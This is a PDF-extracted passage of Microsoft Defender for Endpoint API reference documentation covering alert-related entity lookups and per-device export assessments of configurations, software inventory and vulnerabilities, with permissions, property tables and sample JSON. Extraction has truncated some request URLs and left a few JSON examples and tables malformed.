Here is an example of the request.
HTTP
GET
80442/files
Response example
Here is an example of the response.
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Files",
"value": [
{
"sha1": "f2a00fd2f2de1be0214b8529f1e9f67096c1aa70",
"sha256":
"dcd71ef5fff4362a9f64cf3f96f14f2b11d6f428f3badbedcb9ff3361e7079aa",
"md5": "8d5b7cc9a832e21d22503057e1fec8e9",
"globalPrevalence": 29,
"globalFirstObserved": "2019-03-23T23:54:06.0135204Z",
"globalLastObserved": "2019-04-23T00:43:20.0489831Z",
"size": 113984,
"fileType": null,
"isPeFile": true,
"filePublisher": "Microsoft Corporation",
"fileProductName": "Microsoft© Windows© Operating System",
"signer": "Microsoft Corporation",
"issuer": "Microsoft Code Signing PCA",
"signerHash": "9dc17888b5cfad98b3cb35c1994e96227f061675",
"isValidCertificate": true,
"determinationType": "Unknown",
"determinationValue": null
}
...
]
}
 Tip
Feedback

Get alert-related IPs' information API
Article • 09/27/2023
Applies to:

７ Note
 Tip
API description
Retrieves all IPs related to a specific alert.
Limitations
period.
Permissions
ﾉ Expand table
Application Ip.Read.All 'Read IP address profiles'
Delegated (work or school account) Ip.Read.All 'Read IP address profiles'
７ Note
more information, see Create and manage roles
device groups
HTTP request
HTTP
GET /api/alerts/{id}/ips
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and alert and an IP exist - 200 OK. If alert not found - 404 Not Found.
Example
Request example
HTTP
GET
https://api.securitycenter.microsoft.com/alerts/636688558380765161_213628044
2/ips
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/$metadata#Ips",
"value": [
{
"id": "104.80.104.128"
},
{
"id": "23.203.232.228
}
...
]
}
 Tip
Feedback

Get alert related machine information
API
Article • 11/15/2023
Applies to:

７ Note
 Tip
API description
Retrieves Device related to a specific alert.
Limitations
period.
Permissions
ﾉ Expand table
Application Machine.Read.All 'Read all machine information'
Application Machine.ReadWrite.All 'Read and write all machine

information'
Delegated (work or school Machine.Read 'Read machine information'

account)
Delegated (work or school Machine.ReadWrite 'Read and write machine information'

account)
７ Note
information)
HTTP request
HTTP
GET /api/alerts/{id}/machine
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and alert and device exist - 200 OK. If alert not found or device not found -
404 Not Found.
Example
Request example
HTTP
GET
80442/machine
Response example
JSON
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2021-01-25T07:27:36.052313Z",
"osPlatform": "Windows10" "Windows11",
"osProcessor": "x64",
"version": "1901",
"lastIpAddress": "10.166.113.46",
"lastExternalIpAddress": "167.220.203.175",
"osBuild": 19042,
"healthStatus": "Active",
"deviceValue": "Normal",
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"exposureLevel": "Low",
"aadDeviceId": "fd2e4d29-7072-4195-aaa5-1af139b78028",
"machineTags": [
"Tag1",
"Tag2"
],
"ipAddresses": [
{
"ipAddress": "10.166.113.47",
"macAddress": "8CEC4B897E73",
"operationalStatus": "Up"
},
{
"ipAddress": "2a01:110:68:4:59e4:3916:3b3e:4f96",
}
]
}
 Tip
Feedback

Get alert related user information API
Article • 11/15/2023
Applies to:

７ Note
 Tip
API description
Retrieves the User related to a specific alert.
Limitations
You can query on alerts last updated according to your configured retention
period.
Permissions
ﾉ Expand table
Application User.Read.All 'Read user profiles'
Delegated (work or school account) User.Read.All 'Read user profiles'
７ Note
information)
HTTP request
HTTP
GET /api/alerts/{id}/user
Request headers
ﾉ Expand table
Request body
Empty
Response
If successful and alert and a user exists - 200 OK with user in the body. If alert or user
not found - 404 Not Found.
Example
Request example
HTTP
GET
80442/user
Response example
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Users/$entity",
"id": "contoso\\user1",
"accountName": "user1",
"accountDomain": "contoso",
"accountSid": "S-1-5-21-72051607-1745760036-109187956-93922",
"firstSeen": "2019-12-08T06:33:39Z",
"lastSeen": "2020-01-05T06:58:34Z",
"mostPrevalentMachineId": "0111b647235c26159bec3e5eb6c8c3a0cc3ab766",
"leastPrevalentMachineId": "0111b647235c26159bec3e5eb6c8c3a0cc3ab766",
"logonTypes": "Network",
"logOnMachinesCount": 1,
"isDomainAdmin": false,
"isOnlyNetworkUser": false
}
 Tip
Feedback

Export assessment methods and
properties per device
Article • 09/27/2023
Applies to:

API description
Provides methods and property details about the APIs that pull vulnerability
management data on a per-device basis. There are different API calls to get different
types of data. In general, each API call contains the requisite data for devices in your
organization.
７ Note
Unless indicated otherwise, all export assessment methods listed are full export
and by device (also referred to as per device).
You can use the export assessment APIs to retrieve (export) different types of
information:
1. Export secure configurations assessment

2. Export software inventory assessment
3. Export software vulnerabilities assessment
4. Export non product code software inventory assessment
The APIs that correspond to the export information types are described in sections 1, 2,
and 3.
Each method has different API calls to get different types of data. Because the amount
of data can be large, there are two ways it can be retrieved:
JSON response The API pulls all data in your organization as JSON responses. This
method is best for small organizations with less than 100-K devices. The response is
paginated, so you can use the @odata.nextLink field from the response to fetch
the next results.
via files This API solution enables pulling larger amounts of data faster and more
reliably. So, it's recommended for large organizations, with more than 100-K
devices. This API pulls all data in your organization as download files. The response
contains URLs to download all the data from Azure Storage. This API enables you
to download all your data from Azure Storage as follows:
Call the API to get a list of download URLs with all your organization data.
Download all the files using the download URLs and process the data as you
like.
Data that is collected using either 'JSON response or via files' is the current snapshot of
the current state. It doesn't contain historic data. To collect historic data, customers must
save the data in their own data storages.
1. Export secure configurations assessment

Returns all of the configurations and their status, on a per-device basis.
1.1 Methods
ﾉ Expand table
Method Data type Description
Secure Returns a table with an entry for every unique combination

configuration by of DeviceId, ConfigurationId. The API pulls all data in your
device collection. organization as JSON responses. This method is best for
See: 1.2 Properties small organizations with less than 100-K devices. The
(JSON response) response is paginated, so you can use the @odata.nextLink
field from the response to fetch the next results.
Secure Returns a table with an entry for every unique combination

configuration by of DeviceId, ConfigurationId. This API solution enables
device collection. pulling larger amounts of data faster and more reliably. So,
See: 1.3 Properties it's recommended for large organizations, with more than
(via files) 100-K devices. This API pulls all data in your organization as
download files. The response contains URLs to download all
the data from Azure Storage. This API enables you to
download all your data from Azure Storage as follows:
1. Call the API to get a list of download URLs with all your
organization data.
2. Download all the files using the download URLs and
process the data as you like.
1.2 Properties (JSON response)
ﾉ Expand table
Property (ID) Data Description

type
configurationCategory String Category or grouping to which the configuration belongs:

Application, OS, Network, Accounts, Security controls.
configurationId String Unique identifier for a specific configuration.
configurationImpact String Rated effect of the configuration to the overall

configuration score (1-10).
configurationName String Display name of the configuration.
configurationSubcategory String Subcategory or subgrouping to which the configuration

belongs. In many cases, specific capabilities or features.
deviceId String Unique identifier for the device in the service.
deviceName String Fully qualified domain name (FQDN) of the device.
isApplicable Bool Indicates whether the configuration or policy is applicable.
isCompliant Bool Indicates whether the configuration or policy is properly

configured.
isExpectedUserImpact Bool Indicates whether the user gets affected if the

configuration will be applied.
osPlatform String Platform of the operating system running on the device.

Specific operating systems with variations within the same
family, such as Windows 10 and Windows 11. See
Supported operating systems, platforms and capabilities
for details.
osVersion String Specific version of the operating system running on the

device.
rbacGroupName String The role-based access control (RBAC) group. If the device
isn't assigned to any RBAC group, the value will be
type
"Unassigned." If the organization doesn't contain any RBAC

groups, the value will be "None."
rbacGroupId String The role-based access control (RBAC) group ID.
recommendationReference String A reference to the recommendation ID related to the

software.
timestamp String Last time the configuration was seen on the device.
1.3 Properties (via files)
ﾉ Expand table
Property (ID) Data type Description
Export files array[string] A list of download URLs for files holding the current snapshot of
the organization.
GeneratedTime String The time that the export was generated.
2. Export software inventory assessment

Returns all of the installed software and their details on each device.
2.1 Methods
ﾉ Expand table
Export Software Returns a table with an entry for every unique combination of
software inventory by DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
inventory device The API pulls all data in your organization as JSON
assessment collection. See: responses. This method is best for small organizations with
(JSON 2.2 Properties less than 100-K devices. The response is paginated, so you
response) (JSON can use the @odata.nextLink field from the response to fetch
response) the next results.
Export Software Returns a table with an entry for every unique combination of
software inventory by DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
inventory device files. See: This API solution enables pulling larger amounts of data
faster and more reliably. So, it's recommended for large
assessment 2.3 Properties organizations, with more than 100-K devices. This API pulls
(via files) (via files) all data in your organization as download files. The response
contains URLs to download all the data from Azure Storage.
This API enables you to download data from Azure Storage
as follows:
1. Call the API to get a list of download URLs with your

organization data
2. Download the files using the download URLs and
ﾉ Expand table
DeviceId String Unique identifier for the device in the service.
DeviceName String Fully qualified domain name (FQDN) of the device.
DiskPaths Array[string] Disk evidence that the product is installed on the

device.
EndOfSupportDate String The date in which support for this software has or
will end.
EndOfSupportStatus String End of support status. Can contain these possible

values: None, EOS Version, Upcoming EOS Version,
EOS Software, Upcoming EOS Software.
NumberOfWeaknesses Int Number of weaknesses on this software on this

device.
OSPlatform String Platform of the operating system running on the

device; specific operating systems with variations
within the same family, such as Windows 10 and
Windows 11. See Supported operating systems,
platforms and capabilities for details.
RbacGroupName String The role-based access control (RBAC) group. If this

device isn't assigned to any RBAC group, the value
will be "Unassigned." If the organization doesn't
contain any RBAC groups, the value will be "None."

RegistryPaths Array[string] Registry evidence that the product is installed in

the device.
SoftwareFirstSeenTimestamp String The first time this software was seen on the device.
SoftwareName String Name of the software product.
SoftwareVendor String Name of the software vendor.
SoftwareVersion String Version number of the software product.
ﾉ Expand table
the organization.
3. Export software vulnerabilities assessment

Returns all the known vulnerabilities on a device and their details, for all devices.
3.1 Methods
ﾉ Expand table
Investigation Returns a table with an entry for every unique combination of

collection See: DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion,
3.2 Properties CveId. The API pulls all data in your organization as JSON
(JSON responses. This method is best for small organizations with less
response) than 100-K devices. The response is paginated, so you can use
the @odata.nextLink field from the response to fetch the next
results.
Investigation Returns a table with an entry for every unique combination of

entity See: 3.3 DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion,
Properties (via CveId. This API solution enables pulling larger amounts of data
files) faster and more reliably. So, it's recommended for large
organizations, with more than 100-K devices. This API pulls all
data in your organization as download files. The response
contains URLs to download all the data from Azure Storage. This
API enables you to download all your data from Azure Storage
as follows:
1. Call the API to get a list of download URLs with all your
organization data.
2. Download all the files using the download URLs and
Investigation Returns a table with an entry for every unique combination of:
collection See: DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion,
3.4 Properties CveId, and EventTimestamp.
Delta export The API pulls data in your organization as JSON responses. The
(JSON response is paginated, so you can use the @odata.nextLink field
response) from the response to fetch the next results. The full software
vulnerabilities assessment (JSON response) is used to obtain an
entire snapshot of the software vulnerabilities assessment of
your organization by device. However, the delta export API call
is used to fetch only the changes that have happened between a
selected date and the current date (the "delta" API call). Instead
of getting a full export with a large amount of data every time,
you'll only get specific information on new, fixed, and updated
vulnerabilities. Delta export API call can also be used to calculate
different KPIs such as "how many vulnerabilities were fixed?" or
"how many new vulnerabilities were added to my organization?"
Because the Delta export API call for software vulnerabilities

returns data for only a targeted date range, it isn't considered a
full export.
ﾉ Expand table
CveId String Unique identifier assigned to the security

vulnerability under the Common Vulnerabilities
and Exposures (CVE) system.
CvssScore String The CVSS score of the CVE.
DeviceName String Fully qualified domain name (FQDN) of the

device.
DiskPaths Array[string] Disk evidence that the product is installed on

the device.
ExploitabilityLevel String The exploitability level of this vulnerability

(NoExploit, ExploitIsPublic, ExploitIsVerified,
ExploitIsInKit)
FirstSeenTimestamp String First time the CVE of this product was seen on
the device.
Id String Unique identifier for the record.
LastSeenTimestamp String Last time the CVE was seen on the device.
OSPlatform String Platform of the operating system running on

the device; specific operating systems with
variations within the same family, such as
Windows 10 and Windows 11. See Supported
operating systems, platforms and capabilities
for details.
RbacGroupName String The role-based access control (RBAC) group. If

this device isn't assigned to any RBAC group,
the value will be "Unassigned." If the
organization doesn't contain any RBAC groups,
the value will be "None."
RecommendationReference String A reference to the recommendation ID related

to this software.
RecommendedSecurityUpdate String Name or description of the security update

provided by the software vendor to address the
vulnerability.
RecommendedSecurityUpdateId String Identifier of the applicable security updates or

identifier for the corresponding guidance or
knowledge base (KB) articles.
Registry Paths Array[string] Registry evidence that the product is installed in

the device.
SecurityUpdateAvailable Boolean Indicates whether a security update is available

for the software.

VulnerabilitySeverityLevel String Severity level that is assigned to the security

vulnerability based on the CVSS score.
ﾉ Expand table
the organization.
3.4 Properties (delta export JSON response)
ﾉ Expand table
CveId String Unique identifier assigned to the security

vulnerability under the Common Vulnerabilities
CvssScore String The CVSS score of the CVE.
DeviceName String Fully qualified domain name (FQDN) of the

device.
DiskPaths Array[string] Disk evidence that the product is installed on

the device.
EventTimestamp String The time the delta event was found.
ExploitabilityLevel String The exploitability level of the vulnerability

(NoExploit, ExploitIsPublic, ExploitIsVerified,
ExploitIsInKit)
FirstSeenTimestamp String First time the CVE of the product was seen on
the device.
Id String Unique identifier for the record.

LastSeenTimestamp String Last time the CVE was seen on the device.
OSPlatform String Platform of the operating system running on

the device; specific operating systems with
variations within the same family, such as
Windows 10 and Windows 11. See Supported
operating systems, platforms and capabilities
for details.
RbacGroupName String The role-based access control (RBAC) group. If

this device isn't assigned to any RBAC group,
the value will be "Unassigned." If the
organization doesn't contain any RBAC groups,
the value will be "None."
RecommendationReference String A reference to the recommendation ID related

to this software.
RecommendedSecurityUpdate String Name or description of the security update

provided by the software vendor to address the
vulnerability.
RecommendedSecurityUpdateId String Identifier of the applicable security updates or

identifier for the corresponding guidance or
knowledge base (KB) articles
RegistryPaths Array[string] Registry evidence that the product is installed in

the device.
Status String New (for a new vulnerability introduced on a

device). Fixed (for a vulnerability that doesn't
exist anymore on the device, which means it
was remediated). Updated (for a vulnerability
on a device that has changed. The possible
changes are: CVSS score, exploitability level,
severity level, DiskPaths, RegistryPaths,
RecommendedSecurityUpdate).
VulnerabilitySeverityLevel String Severity level assigned to the security

vulnerability based on the CVSS score.
4. Export non product code software inventory
assessment
Returns all of the installed software that does not have a Common Platform
Enumeration(CPE) and their details on each device.
4.1 Methods
ﾉ Expand table
Export non Non product Returns a table with an entry for every unique combination
product code code software of DeviceId, SoftwareVendor, SoftwareName,
software inventory by SoftwareVersion. The API pulls all data in your organization
inventory device collection. as JSON responses. This method is best for small
assessment See: 4.2 organizations with less than 100-K devices. The response is
(JSON Properties (JSON paginated, so you can use the @odata.nextLink field from
response) response) the response to fetch the next results.
Export non Non product Returns a table with an entry for every unique combination
product code code software of DeviceId, SoftwareVendor, SoftwareName,
software inventory by SoftwareVersion. This API solution enables pulling larger
inventory device files. See: amounts of data faster and more reliably. So, it's
assessment (via 4.3 Properties recommended for large organizations, with more than
files) (via files) 100-K devices. This API pulls all data in your organization
as download files. The response contains URLs to
download all the data from Azure Storage. This API
enables you to download data from Azure Storage as
follows:
1. Call the API to get a list of download URLs with your

organization data
2. Download the files using the download URLs and
ﾉ Expand table

type
DeviceId string Unique identifier for the device in the service.

type
DeviceName string Fully qualified domain name (FQDN) of the device.
OSPlatform string Platform of the operating system running on the device.

These are specific operating systems with variations
Windows 11. See Supported operating systems, platforms
and capabilities for details.
RbacGroupName string The role-based access control (RBAC) group. If this device
isn't assigned to any RBAC group, the value will be
"Unassigned." If the organization doesn't contain any
RBAC groups, the value will be "None."
RbacGroupId string The role-based access control (RBAC) group ID.
SoftwareLastSeenTimestamp string The last time this software was seen on the device.
SoftwareName string Name of the software product.
SoftwareVendor string Name of the software vendor.
SoftwareVersion string Version number of the software product.
ﾉ Expand table
the organization.
See also
Export secure configuration assessment per device
Export software inventory assessment per device
Export software vulnerabilities assessment per device
Export non cpe software inventory assessment per device
Other related

Vulnerabilities in your organization
 Tip
Feedback

Export secure configuration assessment
per device
Article • 09/27/2023
Applies to:

Returns all of the configurations and their status, on a per-device basis.
There are different API calls to get different types of data. Because the amount of data
can be large, there are two ways it can be retrieved:
Export secure configuration assessment JSON response: The API pulls all data in
your organization as Json responses. This method is best for small organizations
with less than 100-K devices. The response is paginated, so you can use the
@odata.nextLink field from the response to fetch the next results.
Export secure configuration assessment via files: This API solution enables pulling
larger amounts of data faster and more reliably. Therefore, it is recommended for
large organizations, with more than 100-K devices. This API pulls all data in your
organization as download files. The response contains URLs to download all the
data from Azure Storage. This API enables you to download all your data from
Azure Storage as follows:
like.
Data that is collected (using either JSON response or via files) is the current snapshot of
the current state, and does not contain historic data. In order to collect historic data,
customers must save the data in their own data storages.
７ Note
1. Export secure configuration assessment

(JSON response)
1.1 API method description

This API response contains the Secure Configuration Assessment on your exposed
devices, and returns an entry for every unique combination of DeviceId, ConfigurationId.
1.1.1 Limitations
Maximum page size is 200,000.
1.2 Permissions
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.
ﾉ Expand table
Application Vulnerability.Read.All 'Read Threat and Vulnerability Management

vulnerability information'
Delegated (work or Vulnerability.Read 'Read Threat and Vulnerability Management

school account) vulnerability information'
1.3 URL
HTTP
GET /api/machines/SecureConfigurationsAssessmentByMachine
1.4 Parameters
pageSize (default = 50,000): Number of results in response.
$top: Number of results to return (doesn't return @odata.nextLink and therefore
doesn't pull all the data).
1.5 Properties
７ Note
The properties defined in the following table are listed alphabetically, by

property ID. When running this API, the resulting output will not necessarily
be returned in the same order listed in this table.
Some additional columns might be returned in the response. These columns
are temporary and might be removed, please use only the documented
columns.
ﾉ Expand table
Property (ID) Data Description Example of a returned value

type
ConfigurationCategory string Category or Security controls

grouping to
which the
configuration
belongs:
Application, OS,
Network,
Accounts,
Security controls
ConfigurationId string Unique identifier scid-10000

for a specific
configuration
ConfigurationImpact string Rated impact of 9

the
configuration to
the overall
configuration
score (1-10)
ConfigurationName string Display name of Onboard devices to Microsoft Defender for

the Endpoint
type
configuration
ConfigurationSubcategory string Subcategory or Onboard Devices

subgrouping to
which the
configuration
belongs. In many
cases, this
describes
specific
capabilities or
features.
DeviceId string Unique identifier 9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1

for the device in
the service.
DeviceName string Fully qualified johnlaptop.europe.contoso.com

domain name
(FQDN) of the
device.
IsApplicable bool Indicates true

whether the
configuration or
policy is
applicable
IsCompliant bool Indicates false

whether the
configuration or
policy is properly
configured
IsExpectedUserImpact bool Indicates true

whether there
will be user
impact if the
configuration
will be applied
OSPlatform string Platform of the Windows10 and Windows 11

operating
system running
on the device.
This indicates
specific
operating
type
systems,
including
variations within
the same family,
such as
Windows 10 and
Windows 11. See
Microsoft
Defender
Vulnerability
Management
(MDVM)
supported
operating
systems and
platforms for
details.
RbacGroupName string The role-based Servers

access control
(RBAC) group. If
this device is not
assigned to any
RBAC group, the
value will be
"Unassigned." If
the organization
doesn't contain
any RBAC
groups, the
value will be
"None."
RecommendationReference string A reference to sca-_-scid-20000

the
recommendation
ID related to this
software.
Timestamp string Last time the 2020-11-03 10:13:34.8476880

configuration
was seen on the
device
1.6 Examples
1.6.1 Request example
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsAs
sessmentByMachine?pageSize=5
1.6.2 Response example
JSON
{
"@odata.context":
"api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windows
DefenderATP.api.AssetConfiguration)",
"value": [
{
"deviceId": "00013ee62c6b12345b10214e1801b217b50ab455c293d",
"rbacGroupName": "hhh",
"deviceName":
"ComputerPII_5d96860d69c73fdd06fc8d1679e1eb73eceb8330",
"osVersion": "NT kernel 6.x",
"timestamp": "2021-01-11 09:47:58.854",
"configurationId": "scid-10000",
"configurationCategory": "Network",
"configurationSubcategory": "",
"configurationImpact": 5,
"isCompliant": true,
"isApplicable": true,
"isExpectedUserImpact": false,
"configurationName": "Disable insecure administration protocol -
Telnet",
"recommendationReference": "sca-_-scid-10000"
},
{
"deviceId": "0002a1be533813b9a8c6de739785365bce7910",
"deviceName": null,
"osVersion": "10.0",
"timestamp": "2021-01-11 09:47:58.854",
"configurationCategory": "Security controls",
"configurationSubcategory": "Onboard Devices",
"isCompliant": false,
"configurationName": "Onboard devices to Microsoft Defender for
Endpoint",
},
{
"deviceId": "0002a1de123456a8c06de736785395d4ce7610",
"deviceName": null,
"osVersion": "10.0",
"timestamp": "2021-01-11 09:47:58.854",
"configurationCategory": "Network",
"configurationName": "Disable insecure administration protocol -
Telnet",
},
{
"deviceId": "00044f912345bdaf756492dbe6db733b6a9c59ab4",
"deviceName":
"ComputerPII_18663d45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eeb80b086e
76bdfa178eadfa25e8de9acfa346.corp.contoso.com",
"osVersion": "10.0.17763.1637",
"timestamp": "2021-01-11 09:47:58.854",
"configurationCategory": "OS",
"configurationName": "Enable 'Domain member: Digitally sign
secure channel data (when possible)'",
},
{
"deviceId": "00044f912345daf759462bde6bd733d6a9c56ab4",
"deviceName":
"ComputerPII_18663b45612eeb224d2de2f5ea3142726e63f16a.DomainPII_21eed80d086e
76dbfa178eadfa25e8be9acfa346.corp.contoso.com",
"osVersion": "10.0.17763.1637",
"timestamp": "2021-01-11 09:47:58.854",
"configurationCategory": "Security controls",
"configurationSubcategory": "Antivirus",
"isApplicable": false,
"configurationName": "Enable Microsoft Defender Antivirus real-
time behavior monitoring for Linux",
}
],
"@odata.nextLink":
"https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsA
ssessmentByMachine?
pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS
0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
}
2. Export secure configuration assessment (via

files)

This API response contains the Secure Configuration Assessment on your exposed
devices, and returns an entry for every unique combination of DeviceId, ConfigurationId.
2.1.1 Limitations
2.2 Permissions
ﾉ Expand table


2.3 URL
HTTP
GET /api/machines/SecureConfigurationsAssessmentExport
Parameters
sasValidHours: The number of hours that the download URLs will be valid for
(Maximum 24 hours).
2.5 Properties
７ Note
The files are gzip compressed & in multiline Json format.

The download URLs are only valid for 3 hours; otherwise you can use the
parameter.
For maximum download speed of your data, you can make sure you are
downloading from the same Azure region in which your data resides.
ﾉ Expand table
Property (ID) Data type Description Example of a returned value
Export files array[string] A list of ["Https://tvmexportstrstgeus.blob.core.windows.net/tvm-

download export...1",
URLs for "https://tvmexportstrstgeus.blob.core.windows.net/tvm-
files holding export...2"]
the current
snapshot of
the
organization
GeneratedTime string The time 2021-05-20T08:00:00Z

that the
export was
generated.
2.6 Examples
HTTP
GET
https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsAs
sessmentExport
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#contoso.windowsDefen
derATP.api.ExportFilesResponse",
"exportFiles": [
"https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-
01-11/1101/ScaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-
00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-
12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-
11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-
11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-
11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
],
"generatedTime": "2021-01-11T11:01:00Z"
}
See also
Export assessment methods and properties per device
Other related

 Tip
Feedback

Article • 09/27/2023
Applies to:

This API returns all the data for installed software that has a Common Platform Enumeration(CPE) , on a per-device basis.
Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
Export software inventory assessment JSON response The API pulls all data in your organization as Json responses. This method is
best for small organizations with less than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from
the response to fetch the next results.
Export software inventory assessment via files This API solution enables pulling larger amounts of data faster and more reliably. So,
it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files.
The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure
Storage as follows:
Download all the files using the download URLs and process the data as you like.
Data that is collected (using either Json response or via files) is the current snapshot of the current state. It doesn't contain historic data. To
collect historic data, customers must save the data in their own data storages.
７ Note
Unless indicated otherwise, all export assessment methods listed are full export and by device (also referred to as per device).
1. Export software inventory assessment (JSON response)

This API response contains all the data of installed software that has a Common Platform Enumeration(CPE) , per device. Returns a table
with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
1.1.1 Limitations
1.2 Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft
Defender for Endpoint APIs for details.
ﾉ Expand table
Application Software.Read.All 'Read Threat and Vulnerability Management software information'
Delegated (work or school account) Software.Read 'Read Threat and Vulnerability Management software information'
1.3 URL
HTTP
GET /api/machines/SoftwareInventoryByMachine
1.4 Parameters
$top: Number of results to return (doesn't return @odata.nextLink and therefore doesn't pull all the data)
1.5 Properties
７ Note
Each record is approximately 0.5KB of data. You should take this into account when choosing the correct pageSize parameter for
you.
The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output
will not necessarily be returned in the same order listed in this table.
Some additional columns might be returned in the response. These columns are temporary and might be removed, please use
only the documented columns.
ﾉ Expand table
DeviceId string Unique 9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1

identifier for
the device in
the service.
DeviceName string Fully qualified johnlaptop.europe.contoso.com

domain name
(FQDN) of
the device.
DiskPaths Array[string] Disk evidence ["C:\Program Files (x86)\Microsoft\Silverlight\Application\silverlight.exe"]

that the
product is
installed on
the device.
EndOfSupportDate string The date in 2020-12-30

which
support for
this software
has or will
end.
EndOfSupportStatus string End of Upcoming EOS

support
status. Can
contain these
possible
values: None,
EOS Version,
Upcoming
EOS Version,
EOS
Software,
Upcoming
EOS
Software.
NumberOfWeaknesses int Number of 3

weaknesses
on this
software on
this device
OSPlatform string Platform of Windows10 and Windows 11

the operating
system
running on
the device.
These are
specific
operating
systems with
variations
within the
same family,
such as
Windows 10
and Windows
11. See
Microsoft
Defender
Vulnerability
Management
supported
operating
systems and
platforms for
details.
RbacGroupName string The role- Servers

based access
control
(RBAC)
group. If this
device is not
assigned to
any RBAC
group, the
value will be
"Unassigned."
If the
organization
doesn't
contain any
RBAC groups,
the value will
be "None."
RegistryPaths Array[string] Registry ["HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\M

evidence that Silverlight"]
the product is
installed in
the device.
SoftwareFirstSeenTimestamp string The first time 2019-04-07 02:06:47

this software
was seen on
the device.
SoftwareName string Name of the Silverlight

software
product.
SoftwareVendor string Name of the microsoft

software
vendor.
SoftwareVersion string Version 81.0.4044.138

number of
the software
product.
1.6 Examples
HTTP
GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryByMachine?pageSize=5 &sinceTime=2021-05-

19T18%3A35%3A49.924Z
JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(contoso.windowsDefenderATP.api.AssetSoftware)",
"value": [
{
"deviceId": "00044f68765bbaf712342dbe6db733b6a9c59ab4",
"deviceName":
"ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
"softwareVendor": "microsoft",
"softwareName": "windows_10" "Windows_11",
"softwareVersion": "10.0.17763.1637",
"numberOfWeaknesses": 58,
"diskPaths": [],
"registryPaths": [],
"softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
"endOfSupportStatus": "Upcoming EOS Version",
"endOfSupportDate": "2021-05-11T00:00:00+00:00"
},
{
"deviceName":
"ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
"softwareName": ".net_framework",
"diskPaths": [],
"registryPaths": [
"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4.0\\Client\\Install"
],
"endOfSupportStatus": "None",
"endOfSupportDate": null
},
{
"deviceName":
"ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eed80d086e79bdfa178eadfa25e8de9acfa346.corp.contoso.com",
"softwareName": "system_center_2012_endpoint_protection",
"diskPaths": [],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Security Client"
],
},
{
"deviceId": "00044f68765ddaf71234bde6bd733d6a9c59ad4",
"deviceName":
"ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178aedfa25e8be9acfa346.corp.contoso.com",
"softwareName": "configuration_manager",
"diskPaths": [],
"registryPaths": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B7D3A842-E826-4542-B39B-
1D883264B279}"
],
},
{
"deviceName":
"ComputerPII_18993b45912eeb224b2de2f5ea3142726e63f16a.DomainPII_21eeb80d086e79bdfa178eadfa25e8be9acfa346.corp.contoso.com",
"diskPaths": [],
"registryPaths": [
],
}
],
"@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryByMachine?
pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0yNS8wMjAwLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpb
mVTdG9wcGVkQXQiOjV9"
}
７ Note
The information returned by this API, along with the information returned by the Export non product code software inventory
assessment API, for software that doesn't have a CPE, gives you full visibility into the software installed across your organization and
the devices it's installed on.
2. Export software inventory assessment (via files)

